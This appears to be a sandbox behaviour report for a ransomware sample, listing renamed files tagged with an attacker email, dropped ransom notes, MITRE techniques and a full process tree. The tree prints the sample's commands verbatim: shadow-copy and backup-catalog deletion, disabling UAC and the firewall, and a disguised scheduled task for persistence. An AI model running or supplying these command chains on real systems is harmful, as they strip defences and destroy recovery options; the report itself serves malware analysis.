File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18196_.WMF[ID=6PsJ67-Mail=FreedomTeam@mail.ee].o5rD	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE03241_.WMF	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHKEY.DAT[ID=6PsJ67-Mail=FreedomTeam@mail.ee].o5rD	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	\??\c:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\ja\PresentationCore.resources.dll	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\shatter.png	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\Mozilla Firefox\xul.dll	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files (x86)\Common Files\System\msadc\fr-FR\msadcfr.dll.mui	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WSSFilesToolIconImages.jpg	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	\??\c:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\System.ServiceModel.Web.dll	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\16_9-frame-image-mask.png	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\MAPISHELL.DLL	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File created	C:\Program Files (x86)\Common Files\System\Read_Me!_.txt	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe[ID=6PsJ67-Mail=FreedomTeam@mail.ee].o5rD	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	\??\c:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\de-DE\css\calendar.css	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\Read_Me!_.txt	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\ARCTIC\ARCTIC.ELM	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0318448.WMF[ID=6PsJ67-Mail=FreedomTeam@mail.ee].o5rD	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\Read_Me!_.txt	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\MDIParent.zip	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Argentina\Salta	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	\??\c:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\8.png	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-ui_ja.jar[ID=6PsJ67-Mail=FreedomTeam@mail.ee].o5rD	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\XLINTL32.DLL.IDX_DLL	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Templates\1033\ONENOTE\14\Stationery\ACADEMIC.ONE[ID=6PsJ67-Mail=FreedomTeam@mail.ee].o5rD	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\DataType\Category.accft[ID=6PsJ67-Mail=FreedomTeam@mail.ee].o5rD	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-autoupdate-cli.jar[ID=6PsJ67-Mail=FreedomTeam@mail.ee].o5rD	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21364_.GIF	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\REPORT.CFG	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe

Drops file in Windows directory 2 IoCs

Processes:

e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe

description	ioc	process
File created	C:\Windows\Pagesfilo.sys	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Windows\Pagesfilo.sys	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

616 schtasks.exe
Delays execution with timeout.exe 9 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid process

1628 timeout.exe
1988 timeout.exe
596 timeout.exe
1060 timeout.exe
1460 timeout.exe
616 timeout.exe
1192 timeout.exe
824 timeout.exe
1136 timeout.exe

pid	process
616	schtasks.exe

pid	process
1628	timeout.exe
1988	timeout.exe
596	timeout.exe
1060	timeout.exe
1460	timeout.exe
616	timeout.exe
1192	timeout.exe
824	timeout.exe
1136	timeout.exe

Enumerates processes with tasklist 1 TTPs 9 IoCs

Process Discovery

T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exe

pid	process
1620	tasklist.exe
1180	tasklist.exe
1728	tasklist.exe
1528	tasklist.exe
904	tasklist.exe
616	tasklist.exe
1920	tasklist.exe
676	tasklist.exe
584	tasklist.exe

Gathers system information 1 TTPs 2 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exesysteminfo.exe

pid process

1620 systeminfo.exe
848 systeminfo.exe
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exevssadmin.exe

pid process

1460 vssadmin.exe
1512 vssadmin.exe

pid	process
1620	systeminfo.exe
848	systeminfo.exe

pid	process
1460	vssadmin.exe
1512	vssadmin.exe

Kills process with taskkill 40 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
1572	taskkill.exe
1884	taskkill.exe
1996	taskkill.exe
1920	taskkill.exe
1824	taskkill.exe
1428	taskkill.exe
1824	taskkill.exe
1904	taskkill.exe
1568	taskkill.exe
1816	taskkill.exe
1156	taskkill.exe
1184	taskkill.exe
1748	taskkill.exe
456	taskkill.exe
624	taskkill.exe
1528	taskkill.exe
1664	taskkill.exe
1924	taskkill.exe
1452	taskkill.exe
1576	taskkill.exe
860	taskkill.exe
1620	taskkill.exe
1092	taskkill.exe
1968	taskkill.exe
1188	taskkill.exe
1728	taskkill.exe
1464	taskkill.exe
552	taskkill.exe
2032	taskkill.exe
872	taskkill.exe
1512	taskkill.exe
1764	taskkill.exe
1732	taskkill.exe
1060	taskkill.exe
1752	taskkill.exe
616	taskkill.exe
1968	taskkill.exe
1272	taskkill.exe
584	taskkill.exe
904	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1708 reg.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

tasklist.exetasklist.exe

pid process

1620 tasklist.exe
1620 tasklist.exe
1920 tasklist.exe
1920 tasklist.exe
Suspicious behavior: RenamesItself 1 IoCs

Processes:

e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe

pid process

1120 e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe

pid	process
1708	reg.exe

pid	process
1120	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

tasklist.exetasklist.exevssvc.exeWMIC.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	1620	tasklist.exe
Token: SeDebugPrivilege	1920	tasklist.exe
Token: SeBackupPrivilege	1392	vssvc.exe
Token: SeRestorePrivilege	1392	vssvc.exe
Token: SeAuditPrivilege	1392	vssvc.exe
Token: SeIncreaseQuotaPrivilege	1932	WMIC.exe
Token: SeSecurityPrivilege	1932	WMIC.exe
Token: SeTakeOwnershipPrivilege	1932	WMIC.exe
Token: SeLoadDriverPrivilege	1932	WMIC.exe
Token: SeSystemProfilePrivilege	1932	WMIC.exe
Token: SeSystemtimePrivilege	1932	WMIC.exe
Token: SeProfSingleProcessPrivilege	1932	WMIC.exe
Token: SeIncBasePriorityPrivilege	1932	WMIC.exe
Token: SeCreatePagefilePrivilege	1932	WMIC.exe
Token: SeBackupPrivilege	1932	WMIC.exe
Token: SeRestorePrivilege	1932	WMIC.exe
Token: SeShutdownPrivilege	1932	WMIC.exe
Token: SeDebugPrivilege	1932	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1932	WMIC.exe
Token: SeRemoteShutdownPrivilege	1932	WMIC.exe
Token: SeUndockPrivilege	1932	WMIC.exe
Token: SeManageVolumePrivilege	1932	WMIC.exe
Token: 33	1932	WMIC.exe
Token: 34	1932	WMIC.exe
Token: 35	1932	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1932	WMIC.exe
Token: SeSecurityPrivilege	1932	WMIC.exe
Token: SeTakeOwnershipPrivilege	1932	WMIC.exe
Token: SeLoadDriverPrivilege	1932	WMIC.exe
Token: SeSystemProfilePrivilege	1932	WMIC.exe
Token: SeSystemtimePrivilege	1932	WMIC.exe
Token: SeProfSingleProcessPrivilege	1932	WMIC.exe
Token: SeIncBasePriorityPrivilege	1932	WMIC.exe
Token: SeCreatePagefilePrivilege	1932	WMIC.exe
Token: SeBackupPrivilege	1932	WMIC.exe
Token: SeRestorePrivilege	1932	WMIC.exe
Token: SeShutdownPrivilege	1932	WMIC.exe
Token: SeDebugPrivilege	1932	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1932	WMIC.exe
Token: SeRemoteShutdownPrivilege	1932	WMIC.exe
Token: SeUndockPrivilege	1932	WMIC.exe
Token: SeManageVolumePrivilege	1932	WMIC.exe
Token: 33	1932	WMIC.exe
Token: 34	1932	WMIC.exe
Token: 35	1932	WMIC.exe
Token: SeDebugPrivilege	552	taskkill.exe
Token: SeDebugPrivilege	1816	taskkill.exe
Token: SeDebugPrivilege	2032	taskkill.exe
Token: SeDebugPrivilege	1620	taskkill.exe
Token: SeDebugPrivilege	584	taskkill.exe
Token: SeDebugPrivilege	1764	taskkill.exe
Token: SeDebugPrivilege	624	taskkill.exe
Token: SeDebugPrivilege	1092	taskkill.exe
Token: SeDebugPrivilege	1968	taskkill.exe
Token: SeDebugPrivilege	1748	taskkill.exe
Token: SeDebugPrivilege	1824	taskkill.exe
Token: SeDebugPrivilege	1528	taskkill.exe
Token: SeDebugPrivilege	456	taskkill.exe
Token: SeDebugPrivilege	1732	taskkill.exe
Token: SeDebugPrivilege	904	taskkill.exe
Token: SeDebugPrivilege	1664	taskkill.exe
Token: SeDebugPrivilege	1188	taskkill.exe
Token: SeDebugPrivilege	1728	taskkill.exe
Token: SeDebugPrivilege	1060	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.execmd.execmd.execmd.exeWScript.execmd.execmd.exe

description	pid	process	target process
PID 1120 wrote to memory of 1552	1120	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe	cmd.exe
PID 1120 wrote to memory of 1552	1120	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe	cmd.exe
PID 1120 wrote to memory of 1552	1120	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe	cmd.exe
PID 1120 wrote to memory of 1552	1120	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe	cmd.exe
PID 1552 wrote to memory of 1620	1552	cmd.exe	tasklist.exe
PID 1552 wrote to memory of 1620	1552	cmd.exe	tasklist.exe
PID 1552 wrote to memory of 1620	1552	cmd.exe	tasklist.exe
PID 1552 wrote to memory of 1620	1552	cmd.exe	tasklist.exe
PID 1552 wrote to memory of 1260	1552	cmd.exe	findstr.exe
PID 1552 wrote to memory of 1260	1552	cmd.exe	findstr.exe
PID 1552 wrote to memory of 1260	1552	cmd.exe	findstr.exe
PID 1552 wrote to memory of 1260	1552	cmd.exe	findstr.exe
PID 1120 wrote to memory of 2032	1120	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe	cmd.exe
PID 1120 wrote to memory of 2032	1120	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe	cmd.exe
PID 1120 wrote to memory of 2032	1120	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe	cmd.exe
PID 1120 wrote to memory of 2032	1120	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe	cmd.exe
PID 1120 wrote to memory of 912	1120	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe	cmd.exe
PID 1120 wrote to memory of 912	1120	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe	cmd.exe
PID 1120 wrote to memory of 912	1120	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe	cmd.exe
PID 1120 wrote to memory of 912	1120	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe	cmd.exe
PID 912 wrote to memory of 332	912	cmd.exe	WScript.exe
PID 912 wrote to memory of 332	912	cmd.exe	WScript.exe
PID 912 wrote to memory of 332	912	cmd.exe	WScript.exe
PID 912 wrote to memory of 332	912	cmd.exe	WScript.exe
PID 1120 wrote to memory of 1728	1120	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe	cmd.exe
PID 1120 wrote to memory of 1728	1120	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe	cmd.exe
PID 1120 wrote to memory of 1728	1120	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe	cmd.exe
PID 1120 wrote to memory of 1728	1120	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe	cmd.exe
PID 1728 wrote to memory of 616	1728	cmd.exe	schtasks.exe
PID 1728 wrote to memory of 616	1728	cmd.exe	schtasks.exe
PID 1728 wrote to memory of 616	1728	cmd.exe	schtasks.exe
PID 1728 wrote to memory of 616	1728	cmd.exe	schtasks.exe
PID 332 wrote to memory of 1076	332	WScript.exe	cmd.exe
PID 332 wrote to memory of 1076	332	WScript.exe	cmd.exe
PID 332 wrote to memory of 1076	332	WScript.exe	cmd.exe
PID 332 wrote to memory of 1076	332	WScript.exe	cmd.exe
PID 332 wrote to memory of 388	332	WScript.exe	cmd.exe
PID 332 wrote to memory of 388	332	WScript.exe	cmd.exe
PID 332 wrote to memory of 388	332	WScript.exe	cmd.exe
PID 332 wrote to memory of 388	332	WScript.exe	cmd.exe
PID 388 wrote to memory of 1920	388	cmd.exe	tasklist.exe
PID 388 wrote to memory of 1920	388	cmd.exe	tasklist.exe
PID 388 wrote to memory of 1920	388	cmd.exe	tasklist.exe
PID 388 wrote to memory of 1920	388	cmd.exe	tasklist.exe
PID 388 wrote to memory of 1748	388	cmd.exe	find.exe
PID 388 wrote to memory of 1748	388	cmd.exe	find.exe
PID 388 wrote to memory of 1748	388	cmd.exe	find.exe
PID 388 wrote to memory of 1748	388	cmd.exe	find.exe
PID 1120 wrote to memory of 1976	1120	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe	cmd.exe
PID 1120 wrote to memory of 1976	1120	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe	cmd.exe
PID 1120 wrote to memory of 1976	1120	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe	cmd.exe
PID 1120 wrote to memory of 1976	1120	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe	cmd.exe
PID 1120 wrote to memory of 1732	1120	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe	cmd.exe
PID 1120 wrote to memory of 1732	1120	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe	cmd.exe
PID 1120 wrote to memory of 1732	1120	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe	cmd.exe
PID 1120 wrote to memory of 1732	1120	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe	cmd.exe
PID 1732 wrote to memory of 848	1732	cmd.exe	systeminfo.exe
PID 1732 wrote to memory of 848	1732	cmd.exe	systeminfo.exe
PID 1732 wrote to memory of 848	1732	cmd.exe	systeminfo.exe
PID 1732 wrote to memory of 848	1732	cmd.exe	systeminfo.exe
PID 1732 wrote to memory of 596	1732	cmd.exe	find.exe
PID 1732 wrote to memory of 596	1732	cmd.exe	find.exe
PID 1732 wrote to memory of 596	1732	cmd.exe	find.exe
PID 1732 wrote to memory of 596	1732	cmd.exe	find.exe

C:\Users\Admin\AppData\Local\Temp\e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
"C:\Users\Admin\AppData\Local\Temp\e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe"
1⤵
- Modifies extensions of user files
- Drops startup file
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of WriteProcessMemory
PID:1120

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"
2⤵
- Suspicious use of WriteProcessMemory
PID:1552

C:\Windows\SysWOW64\tasklist.exe
tasklist /v /fo csv
3⤵
- Enumerates processes with tasklist
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1620

C:\Windows\SysWOW64\findstr.exe
findstr /i "dcdcf"
3⤵
PID:1260

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ver
2⤵
PID:2032

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&t2_svc.bat
2⤵
- Suspicious use of WriteProcessMemory
PID:912

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\v9_svc.vbs"
3⤵
- Suspicious use of WriteProcessMemory
PID:332

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C echo C:\Users\Admin\AppData\h4_svc.bat
4⤵
PID:1076

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\h4_svc.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:388

C:\Windows\SysWOW64\tasklist.exe
tasklist /v
5⤵
- Enumerates processes with tasklist
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1920

C:\Windows\SysWOW64\find.exe
find /I /c "dcdcf"
5⤵
PID:1748

C:\Windows\SysWOW64\vssadmin.exe
vssadmin.exe Delete Shadows /All /Quiet
5⤵
- Interacts with shadow copies
PID:1460

C:\Windows\SysWOW64\timeout.exe
timeout /t 15 /nobreak
5⤵
- Delays execution with timeout.exe
PID:1628

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "ImageName eq e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe" /fo csv
5⤵
- Enumerates processes with tasklist
PID:1180

C:\Windows\SysWOW64\find.exe
find /I "e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe"
5⤵
PID:584

C:\Windows\SysWOW64\timeout.exe
timeout /t 15 /nobreak
5⤵
- Delays execution with timeout.exe
PID:616

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "ImageName eq e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe" /fo csv
5⤵
- Enumerates processes with tasklist
PID:1728

C:\Windows\SysWOW64\find.exe
find /I "e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe"
5⤵
PID:1512

C:\Windows\SysWOW64\timeout.exe
timeout /t 15 /nobreak
5⤵
- Delays execution with timeout.exe
PID:1988

C:\Windows\SysWOW64\find.exe
find /I "e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe"
5⤵
PID:1996

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "ImageName eq e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe" /fo csv
5⤵
- Enumerates processes with tasklist
PID:676

C:\Windows\SysWOW64\timeout.exe
timeout /t 15 /nobreak
5⤵
- Delays execution with timeout.exe
PID:1192

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "ImageName eq e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe" /fo csv
5⤵
- Enumerates processes with tasklist
PID:1528

C:\Windows\SysWOW64\find.exe
find /I "e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe"
5⤵
PID:1816

C:\Windows\SysWOW64\timeout.exe
timeout /t 15 /nobreak
5⤵
- Delays execution with timeout.exe
PID:596

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "ImageName eq e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe" /fo csv
5⤵
- Enumerates processes with tasklist
PID:904

C:\Windows\SysWOW64\find.exe
find /I "e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe"
5⤵
PID:1768

C:\Windows\SysWOW64\timeout.exe
timeout /t 15 /nobreak
5⤵
- Delays execution with timeout.exe
PID:824

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "ImageName eq e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe" /fo csv
5⤵
- Enumerates processes with tasklist
PID:584

C:\Windows\SysWOW64\find.exe
find /I "e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe"
5⤵
PID:1112

C:\Windows\SysWOW64\timeout.exe
timeout /t 15 /nobreak
5⤵
- Delays execution with timeout.exe
PID:1136

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "ImageName eq e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe" /fo csv
5⤵
- Enumerates processes with tasklist
PID:616

C:\Windows\SysWOW64\find.exe
find /I "e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe"
5⤵
PID:332

C:\Windows\SysWOW64\timeout.exe
timeout /t 15 /nobreak
5⤵
- Delays execution with timeout.exe
PID:1060

C:\Windows\SysWOW64\timeout.exe
timeout /t 90 /nobreak
5⤵
- Delays execution with timeout.exe
PID:1460

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\t2_svc.bat'" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:1728

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\Admin\AppData\t2_svc.bat'" /f
3⤵
- Creates scheduled task(s)
PID:616

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c echo %date%-%time%
2⤵
PID:1976

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c systeminfo|find /i "os name"
2⤵
- Suspicious use of WriteProcessMemory
PID:1732

C:\Windows\SysWOW64\systeminfo.exe
systeminfo
3⤵
- Gathers system information
PID:848

C:\Windows\SysWOW64\find.exe
find /i "os name"
3⤵
PID:596

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c systeminfo|find /i "original"
2⤵
PID:1444

C:\Windows\SysWOW64\systeminfo.exe
systeminfo
3⤵
- Gathers system information
PID:1620

C:\Windows\SysWOW64\find.exe
find /i "original"
3⤵
PID:1184

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ver
2⤵
PID:1572

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com
2⤵
PID:1568

C:\Windows\SysWOW64\nslookup.exe
nslookup myip.opendns.com. resolver1.opendns.com
3⤵
PID:656

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet
2⤵
PID:1704

C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
3⤵
- Modifies registry key
PID:1708

C:\Windows\SysWOW64\vssadmin.exe
vssadmin.exe Delete Shadows /All /Quiet
3⤵
- Interacts with shadow copies
PID:1512

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1932

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set currentprofile state off
3⤵
PID:676

C:\Windows\SysWOW64\netsh.exe
netsh firewall set opmode mode=disable
3⤵
PID:1448

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes
3⤵
PID:1904

C:\Windows\SysWOW64\cmd.exe
